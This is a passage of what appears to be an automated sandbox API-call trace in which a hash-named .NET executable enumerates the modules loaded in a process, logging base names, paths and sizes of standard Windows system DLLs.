0x2e4 [0166.718] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2397970, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x2397970, lpcbNeeded=0x19cb68) returned 1 [0166.719] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x2397ab0, cb=0xc | out: lpmodinfo=0x2397ab0*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0166.720] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.720] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0166.720] CoTaskMemFree (pv=0x8b4098) [0166.720] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.720] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0166.720] CoTaskMemFree (pv=0x8b4098) [0166.720] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x2399cd4, cb=0xc | out: lpmodinfo=0x2399cd4*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0166.721] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.721] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0166.721] CoTaskMemFree (pv=0x8b4098) [0166.721] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.721] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0166.721] CoTaskMemFree (pv=0x8b4098) [0166.721] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x239bdd8, cb=0xc | out: lpmodinfo=0x239bdd8*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0166.722] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.722] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0166.722] CoTaskMemFree (pv=0x8b4098) [0166.722] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.722] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0166.722] CoTaskMemFree (pv=0x8b4098) [0166.722] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x239dee4, cb=0xc | out: lpmodinfo=0x239dee4*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0166.723] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.723] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0166.723] CoTaskMemFree (pv=0x8b4098) [0166.723] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.723] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0166.723] CoTaskMemFree (pv=0x8b4098) [0166.723] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x239fff8, cb=0xc | out: lpmodinfo=0x239fff8*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, EntryPoint=0x757c1b90)) returned 1 [0166.724] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.724] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0166.724] CoTaskMemFree (pv=0x8b4098) [0166.724] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.724] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0166.725] CoTaskMemFree (pv=0x8b4098) [0166.725] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x23a2140, cb=0xc | out: lpmodinfo=0x23a2140*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0166.725] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.725] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0166.725] CoTaskMemFree (pv=0x8b4098) [0166.726] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.726] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0166.726] CoTaskMemFree (pv=0x8b4098) [0166.726] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x23a424c, cb=0xc | out: lpmodinfo=0x23a424c*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0166.726] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.726] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0166.730] CoTaskMemFree (pv=0x8b4098) [0166.731] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.731] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0166.731] CoTaskMemFree (pv=0x8b4098) [0166.731] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x23a6360, cb=0xc | out: lpmodinfo=0x23a6360*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0166.732] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.732] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0166.732] CoTaskMemFree (pv=0x8b4098) [0166.732] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.732] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0166.733] CoTaskMemFree (pv=0x8b4098) [0166.733] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x23a846c, cb=0xc | out: lpmodinfo=0x23a846c*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0166.733] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.733] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0166.734] CoTaskMemFree (pv=0x8b4098) [0166.734] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.734] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0166.734] CoTaskMemFree (pv=0x8b4098) [0166.735] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75970000, lpmodinfo=0x23aa5c4, cb=0xc | out: lpmodinfo=0x23aa5c4*(lpBaseOfDll=0x75970000, SizeOfImage=0xad000, EntryPoint=0x75984f00)) returned 1 [0166.735] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.735] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0166.736] CoTaskMemFree (pv=0x8b4098) [0166.736] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.736] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0166.737] CoTaskMemFree (pv=0x8b4098) [0166.737] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e40000, lpmodinfo=0x23ac6d0, cb=0xc | out: lpmodinfo=0x23ac6d0*(lpBaseOfDll=0x73e40000, SizeOfImage=0x1e000, EntryPoint=0x73e4b640)) returned 1 [0166.737] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.737] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0166.739] CoTaskMemFree (pv=0x8b4098) [0166.739] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.739] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0166.739] CoTaskMemFree (pv=0x8b4098) [0166.739] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e30000, lpmodinfo=0x23ae7dc, cb=0xc | out: lpmodinfo=0x23ae7dc*(lpBaseOfDll=0x73e30000, SizeOfImage=0xa000, EntryPoint=0x73e32a00)) returned 1 [0166.740] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.740] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0166.742] CoTaskMemFree (pv=0x8b4098) [0166.742] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.742] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0166.743] CoTaskMemFree (pv=0x8b4098) [0166.743] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77040000, lpmodinfo=0x23b08f0, cb=0xc | out: lpmodinfo=0x23b08f0*(lpBaseOfDll=0x77040000, SizeOfImage=0x58000, EntryPoint=0x770825c0)) returned 1 [0166.743] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.743] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0166.744] CoTaskMemFree (pv=0x8b4098) [0166.744] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.745] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0166.745] CoTaskMemFree (pv=0x8b4098) [0166.745] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c8d0000, lpmodinfo=0x23b2a24, cb=0xc | out: lpmodinfo=0x23b2a24*(lpBaseOfDll=0x6c8d0000, SizeOfImage=0x79000, EntryPoint=0x6c8df82a)) returned 1 [0166.746] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.746] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0166.746] CoTaskMemFree (pv=0x8b4098) [0166.747] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.747] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0166.747] CoTaskMemFree (pv=0x8b4098) [0166.747] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a00000, lpmodinfo=0x23b4b6c, cb=0xc | out: lpmodinfo=0x23b4b6c*(lpBaseOfDll=0x74a00000, SizeOfImage=0x45000, EntryPoint=0x74a1de90)) returned 1 [0166.748] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.748] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0166.749] CoTaskMemFree (pv=0x8b4098) [0166.750] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.750] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0166.750] CoTaskMemFree (pv=0x8b4098) [0166.750] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74400000, lpmodinfo=0x23b6c78, cb=0xc | out: lpmodinfo=0x23b6c78*(lpBaseOfDll=0x74400000, SizeOfImage=0x1bd000, EntryPoint=0x744e2a10)) returned 1 [0166.751] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.751] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0166.752] CoTaskMemFree (pv=0x8b4098) [0166.752] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.752] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0166.752] CoTaskMemFree (pv=0x8b4098) [0166.753] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a50000, lpmodinfo=0x23b8d84, cb=0xc | out: lpmodinfo=0x23b8d84*(lpBaseOfDll=0x74a50000, SizeOfImage=0x14f000, EntryPoint=0x74b06820)) returned 1 [0166.753] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.753] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0166.754] CoTaskMemFree (pv=0x8b4098) [0166.754] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.754] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0166.755] CoTaskMemFree (pv=0x8b4098) [0166.755] GetModuleInformation (in: hProcess=0x2e4, hModule=0x755c0000, lpmodinfo=0x23baf14, cb=0xc | out: lpmodinfo=0x23baf14*(lpBaseOfDll=0x755c0000, SizeOfImage=0x147000, EntryPoint=0x755d1cf0)) returned 1 [0166.755] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.756] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0166.756] CoTaskMemFree (pv=0x8b4098) [0166.757] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.757] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0166.757] CoTaskMemFree (pv=0x8b4098) [0166.757] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74990000, lpmodinfo=0x23bd020, cb=0xc | out: lpmodinfo=0x23bd020*(lpBaseOfDll=0x74990000, SizeOfImage=0x2b000, EntryPoint=0x74995680)) returned 1 [0166.758] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.758] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0166.759] CoTaskMemFree (pv=0x8b4098) [0166.759] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.759] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0166.760] CoTaskMemFree (pv=0x8b4098) [0166.760] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77030000, lpmodinfo=0x23bf124, cb=0xc | out: lpmodinfo=0x23bf124*(lpBaseOfDll=0x77030000, SizeOfImage=0xc000, EntryPoint=0x77033930)) returned 1 [0166.761] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.761] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0166.762] CoTaskMemFree (pv=0x8b4098) [0166.762] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.762] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0166.762] CoTaskMemFree (pv=0x8b4098) [0166.762] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d310000, lpmodinfo=0x23c1250, cb=0xc | out: lpmodinfo=0x23c1250*(lpBaseOfDll=0x6d310000, SizeOfImage=0x8000, EntryPoint=0x6d3117b0)) returned 1 [0166.763] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.763] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0166.765] CoTaskMemFree (pv=0x8b4098) [0166.765] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.765] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0166.766] CoTaskMemFree (pv=0x8b4098) [0166.766] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6b6f0000, lpmodinfo=0x23c335c, cb=0xc | out: lpmodinfo=0x23c335c*(lpBaseOfDll=0x6b6f0000, SizeOfImage=0x6b1000, EntryPoint=0x6b705d20)) returned 1 [0166.766] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.766] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0166.767] CoTaskMemFree (pv=0x8b4098) [0166.768] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.768] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0166.776] CoTaskMemFree (pv=0x8b4098) [0166.776] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c650000, lpmodinfo=0x23c548c, cb=0xc | out: lpmodinfo=0x23c548c*(lpBaseOfDll=0x6c650000, SizeOfImage=0xf5000, EntryPoint=0x6c6a4160)) returned 1 [0166.777] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.777] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0166.779] CoTaskMemFree (pv=0x8b4098) [0166.779] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.779] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0166.780] CoTaskMemFree (pv=0x8b4098) [0166.780] GetModuleInformation (in: hProcess=0x2e4, hModule=0x69850000, lpmodinfo=0x23c75c0, cb=0xc | out: lpmodinfo=0x23c75c0*(lpBaseOfDll=0x69850000, SizeOfImage=0x1228000, EntryPoint=0x0)) returned 1 [0166.780] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.781] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0166.782] CoTaskMemFree (pv=0x8b4098) [0166.782] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.782] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0166.782] CoTaskMemFree (pv=0x8b4098) [0166.783] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75360000, lpmodinfo=0x23c9768, cb=0xc | out: lpmodinfo=0x23c9768*(lpBaseOfDll=0x75360000, SizeOfImage=0xeb000, EntryPoint=0x7539d650)) returned 1 [0166.783] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.783] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0166.784] CoTaskMemFree (pv=0x8b4098) [0166.784] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.785] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0166.785] CoTaskMemFree (pv=0x8b4098) [0166.785] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6fef0000, lpmodinfo=0x23cb86c, cb=0xc | out: lpmodinfo=0x23cb86c*(lpBaseOfDll=0x6fef0000, SizeOfImage=0x75000, EntryPoint=0x6ff29a60)) returned 1 [0166.787] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.787] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0166.787] CoTaskMemFree (pv=0x8b4098) [0166.787] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.787] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0166.789] CoTaskMemFree (pv=0x8b4098) [0166.789] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f820000, lpmodinfo=0x23cd978, cb=0xc | out: lpmodinfo=0x23cd978*(lpBaseOfDll=0x6f820000, SizeOfImage=0x13000, EntryPoint=0x6f829950)) returned 1 [0166.790] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.790] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0166.790] CoTaskMemFree (pv=0x8b4098) [0166.790] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.790] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0166.791] CoTaskMemFree (pv=0x8b4098) [0166.791] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f7f0000, lpmodinfo=0x23cfa84, cb=0xc | out: lpmodinfo=0x23cfa84*(lpBaseOfDll=0x6f7f0000, SizeOfImage=0x2f000, EntryPoint=0x6f8095e0)) returned 1 [0166.792] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.792] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0166.793] CoTaskMemFree (pv=0x8b4098) [0166.793] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.793] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0166.794] CoTaskMemFree (pv=0x8b4098) [0166.794] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73ae0000, lpmodinfo=0x23d1b90, cb=0xc | out: lpmodinfo=0x23d1b90*(lpBaseOfDll=0x73ae0000, SizeOfImage=0x1b000, EntryPoint=0x73ae9050)) returned 1 [0166.795] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.795] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0166.796] CoTaskMemFree (pv=0x8b4098) [0166.796] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.796] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0166.797] CoTaskMemFree (pv=0x8b4098) [0166.797] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c850000, lpmodinfo=0x23d3c9c, cb=0xc | out: lpmodinfo=0x23d3c9c*(lpBaseOfDll=0x6c850000, SizeOfImage=0x7e000, EntryPoint=0x6c851140)) returned 1 [0166.797] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.797] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0166.798] CoTaskMemFree (pv=0x8b4098) [0166.798] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.798] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0166.799] CoTaskMemFree (pv=0x8b4098) [0166.799] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75b00000, lpmodinfo=0x23d5ddc, cb=0xc | out: lpmodinfo=0x23d5ddc*(lpBaseOfDll=0x75b00000, SizeOfImage=0x92000, EntryPoint=0x75b38cf0)) returned 1 [0166.802] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.802] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4098, nSize=0x800 | out: 